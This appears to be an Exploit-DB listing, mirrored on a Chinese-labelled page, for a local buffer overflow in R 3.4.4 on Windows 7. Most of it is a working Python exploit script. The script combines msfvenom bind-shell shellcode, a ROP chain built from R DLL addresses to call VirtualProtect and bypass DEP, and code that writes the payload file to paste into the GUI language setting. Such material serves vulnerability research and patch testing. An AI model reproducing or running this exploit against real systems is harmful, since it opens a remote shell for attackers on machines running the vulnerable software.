R 3.4.4 – Local Buffer Overflow (DEP Bypass)

  • 作者: Hashim Jawad
    日期: 2018-05-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44680/
  • # Exploit Title: R v3.4.4 - Local Buffer Overflow (DEP Bypass)
    # Exploit Author: Hashim Jawad
    # Exploit Date: 2018-05-21
    # Vendor Homepage: https://www.r-project.org/
    # Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe
    # Tested on OS: Microsoft Windows 7 Enterprise - SP1 (x86)
    # Steps to reproduce: under GUI preferences, paste payload.txt contents into 'Language for menus and messages'
    
    # Credit to bzyo for finding the bug (44516)
    
    #!/usr/bin/python
    
    import struct
    
    #root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "\x00\x0a\x0d\x0e" -f python -v shellcode
    #Payload size: 718 bytes
    shellcode =""
    shellcode += "\x89\xe0\xdb\xd2\xd9\x70\xf4\x5b\x53\x59\x49\x49"
    shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
    shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
    shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
    shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    shellcode += "\x69\x6c\x59\x78\x6c\x42\x77\x70\x33\x30\x37\x70"
    shellcode += "\x31\x70\x6b\x39\x6a\x45\x65\x61\x39\x50\x72\x44"
    shellcode += "\x6e\x6b\x30\x50\x56\x50\x4e\x6b\x62\x72\x56\x6c"
    shellcode += "\x6c\x4b\x31\x42\x34\x54\x4c\x4b\x62\x52\x64\x68"
    shellcode += "\x56\x6f\x68\x37\x70\x4a\x61\x36\x55\x61\x79\x6f"
    shellcode += "\x6e\x4c\x75\x6c\x73\x51\x51\x6c\x67\x72\x46\x4c"
    shellcode += "\x57\x50\x4b\x71\x5a\x6f\x36\x6d\x76\x61\x6b\x77"
    shellcode += "\x7a\x42\x39\x62\x76\x32\x73\x67\x6e\x6b\x36\x32"
    shellcode += "\x72\x30\x4e\x6b\x73\x7a\x55\x6c\x4e\x6b\x62\x6c"
    shellcode += "\x42\x31\x72\x58\x38\x63\x51\x58\x35\x51\x6b\x61"
    shellcode += "\x52\x71\x4e\x6b\x72\x79\x31\x30\x57\x71\x78\x53"
    shellcode += "\x6c\x4b\x50\x49\x64\x58\x6b\x53\x77\x4a\x70\x49"
    shellcode += "\x6e\x6b\x37\x44\x4e\x6b\x67\x71\x4b\x66\x45\x61"
    shellcode += "\x69\x6f\x6c\x6c\x49\x51\x6a\x6f\x46\x6d\x57\x71"
    shellcode += "\x5a\x67\x56\x58\x39\x70\x42\x55\x4b\x46\x74\x43"
    shellcode += "\x53\x4d\x59\x68\x35\x6b\x73\x4d\x47\x54\x64\x35"
    shellcode += "\x5a\x44\x36\x38\x6c\x4b\x56\x38\x57\x54\x76\x61"
    shellcode += "\x38\x53\x43\x56\x4c\x4b\x64\x4c\x30\x4b\x6c\x4b"
    shellcode += "\x33\x68\x35\x4c\x57\x71\x59\x43\x6c\x4b\x36\x64"
    shellcode += "\x6c\x4b\x46\x61\x4e\x30\x6b\x39\x63\x74\x47\x54"
    shellcode += "\x55\x74\x31\x4b\x43\x6b\x50\x61\x71\x49\x52\x7a"
    shellcode += "\x62\x71\x6b\x4f\x6b\x50\x61\x4f\x51\x4f\x32\x7a"
    shellcode += "\x6c\x4b\x66\x72\x5a\x4b\x4c\x4d\x71\x4d\x50\x68"
    shellcode += "\x76\x53\x45\x62\x65\x50\x75\x50\x31\x78\x73\x47"
    shellcode += "\x71\x63\x74\x72\x31\x4f\x62\x74\x75\x38\x50\x4c"
    shellcode += "\x70\x77\x55\x76\x36\x67\x49\x6f\x6b\x65\x6d\x68"
    shellcode += "\x7a\x30\x73\x31\x55\x50\x65\x50\x36\x49\x78\x44"
    shellcode += "\x33\x64\x62\x70\x65\x38\x65\x79\x6d\x50\x30\x6b"
    shellcode += "\x43\x30\x39\x6f\x39\x45\x31\x7a\x56\x68\x70\x59"
    shellcode += "\x70\x50\x69\x72\x59\x6d\x37\x30\x70\x50\x71\x50"
    shellcode += "\x50\x50\x33\x58\x39\x7a\x46\x6f\x79\x4f\x6d\x30"
    shellcode += "\x59\x6f\x69\x45\x7a\x37\x75\x38\x65\x52\x43\x30"
    shellcode += "\x37\x61\x63\x6c\x4f\x79\x5a\x46\x31\x7a\x34\x50"
    shellcode += "\x30\x56\x31\x47\x45\x38\x39\x52\x79\x4b\x66\x57"
    shellcode += "\x42\x47\x59\x6f\x5a\x75\x50\x57\x51\x78\x6c\x77"
    shellcode += "\x48\x69\x54\x78\x69\x6f\x6b\x4f\x59\x45\x72\x77"
    shellcode += "\x75\x38\x33\x44\x7a\x4c\x75\x6b\x39\x71\x49\x6f"
    shellcode += "\x78\x55\x71\x47\x6c\x57\x75\x38\x70\x75\x70\x6e"
    shellcode += "\x42\x6d\x35\x31\x79\x6f\x38\x55\x72\x48\x70\x63"
    shellcode += "\x42\x4d\x71\x74\x37\x70\x4f\x79\x79\x73\x71\x47"
    shellcode += "\x70\x57\x71\x47\x74\x71\x78\x76\x53\x5a\x42\x32"
    shellcode += "\x62\x79\x52\x76\x6b\x52\x59\x6d\x35\x36\x79\x57"
    shellcode += "\x52\x64\x35\x74\x57\x4c\x37\x71\x43\x31\x4e\x6d"
    shellcode += "\x50\x44\x36\x44\x56\x70\x59\x56\x47\x70\x42\x64"
    shellcode += "\x46\x34\x70\x50\x36\x36\x50\x56\x50\x56\x71\x56"
    shellcode += "\x42\x76\x30\x4e\x73\x66\x76\x36\x66\x33\x76\x36"
    shellcode += "\x32\x48\x42\x59\x68\x4c\x55\x6f\x6d\x56\x49\x6f"
    shellcode += "\x6b\x65\x4b\x39\x59\x70\x72\x6e\x70\x56\x51\x56"
    shellcode += "\x4b\x4f\x34\x70\x51\x78\x34\x48\x4e\x67\x37\x6d"
    shellcode += "\x51\x70\x59\x6f\x38\x55\x6d\x6b\x6c\x30\x48\x35"
    shellcode += "\x69\x32\x72\x76\x62\x48\x4c\x66\x5a\x35\x4f\x4d"
    shellcode += "\x4d\x4d\x69\x6f\x4a\x75\x65\x6c\x67\x76\x73\x4c"
    shellcode += "\x47\x7a\x4f\x70\x59\x6b\x4b\x50\x70\x75\x57\x75"
    shellcode += "\x6f\x4b\x53\x77\x55\x43\x64\x32\x52\x4f\x51\x7a"
    shellcode += "\x53\x30\x46\x33\x4b\x4f\x4b\x65\x41\x41"
    
    '''
    Output generated by mona.py v2.0, rev 582 - Immunity Debugger
    --------------------------------------------
    Register setup for VirtualProtect() :
    --------------------------------------------
     EAX = NOP (0x90909090)
     ECX = lpOldProtect (ptr to W address)
     EDX = NewProtect (0x40)
     EBX = dwSize
     ESP = lPAddress (automatic)
     EBP = ReturnTo (ptr to jmp esp)
     ESI = ptr to VirtualProtect()
     EDI = ROP NOP (RETN)
    --------------------------------------------
    '''
    
    rop= struct.pack('<L', 0x6cacc7e2)# POP EAX # RETN[R.dll] 
    rop += struct.pack('<L', 0x643cb170)# ptr to &VirtualProtect()[IAT Riconv.dll]
    rop += struct.pack('<L', 0x6e7d5435)# MOV EAX,DWORD PTR DS:[EAX] # RETN [utils.dll] 
    rop += struct.pack('<L', 0x6ca347fa)# XCHG EAX,ESI # RETN [R.dll] 
    rop += struct.pack('<L', 0x6cb7429a)# POP EBP # RETN[R.dll] 
    rop += struct.pack('<L', 0x6ca2a9bd)# & jmp esp [R.dll]
    rop += struct.pack('<L', 0x64c45db2)# POP EAX # RETN[methods.dll] 
    rop += struct.pack('<L', 0xfffffaff)# value to negate, will become 0x00000501
    rop += struct.pack('<L', 0x643c361a)# NEG EAX # RETN[Riconv.dll] 
    rop += struct.pack('<L', 0x6ca33b8a)# XCHG EAX,EBX # RETN [R.dll] 
    rop += struct.pack('<L', 0x6cbef3e4)# POP EAX # RETN[R.dll] 
    rop += struct.pack('<L', 0xffffffc0)# Value to negate, will become 0x00000040
    rop += struct.pack('<L', 0x6ff3a39a)# NEG EAX # RETN[grDevices.dll] 
    rop += struct.pack('<L', 0x6ca558be)# XCHG EAX,EDX # RETN [R.dll] 
    rop += struct.pack('<L', 0x6cbe90a8)# POP ECX # RETN[R.dll] 
    rop += struct.pack('<L', 0x6ff863c1)# &Writable location[grDevices.dll]
    rop += struct.pack('<L', 0x6cbe097f)# POP EDI # RETN[R.dll] 
    rop += struct.pack('<L', 0x6375fe5c)# RETN (ROP NOP)[Rgraphapp.dll]
    rop += struct.pack('<L', 0x6c998f58)# POP EAX # RETN[R.dll] 
    rop += struct.pack('<L', 0x90909090)# nop
    rop += struct.pack('<L', 0x6fedfa6c)# PUSHAD # RETN [grDevices.dll] 
    
    buffer= '\x41' * 292# filler to EIP
    buffer += struct.pack('<L', 0x6fef93c6) # POP ESI # RETN[grDevices.dll]
    buffer += '\x41' * 4# compensate for pop esi
    buffer += rop
    buffer += '\x90' * 50
    buffer += shellcode
    buffer += '\x90' * (5000-292-4-4-len(rop)-50-len(shellcode))
    
    try:
    	f=open('payload.txt','w')
    	print '[+] Creating %s bytes evil payload..' %len(buffer)
    	f.write(buffer)
    	f.close()
    	print '[+] File created!'
    except Exception as e:
    	print e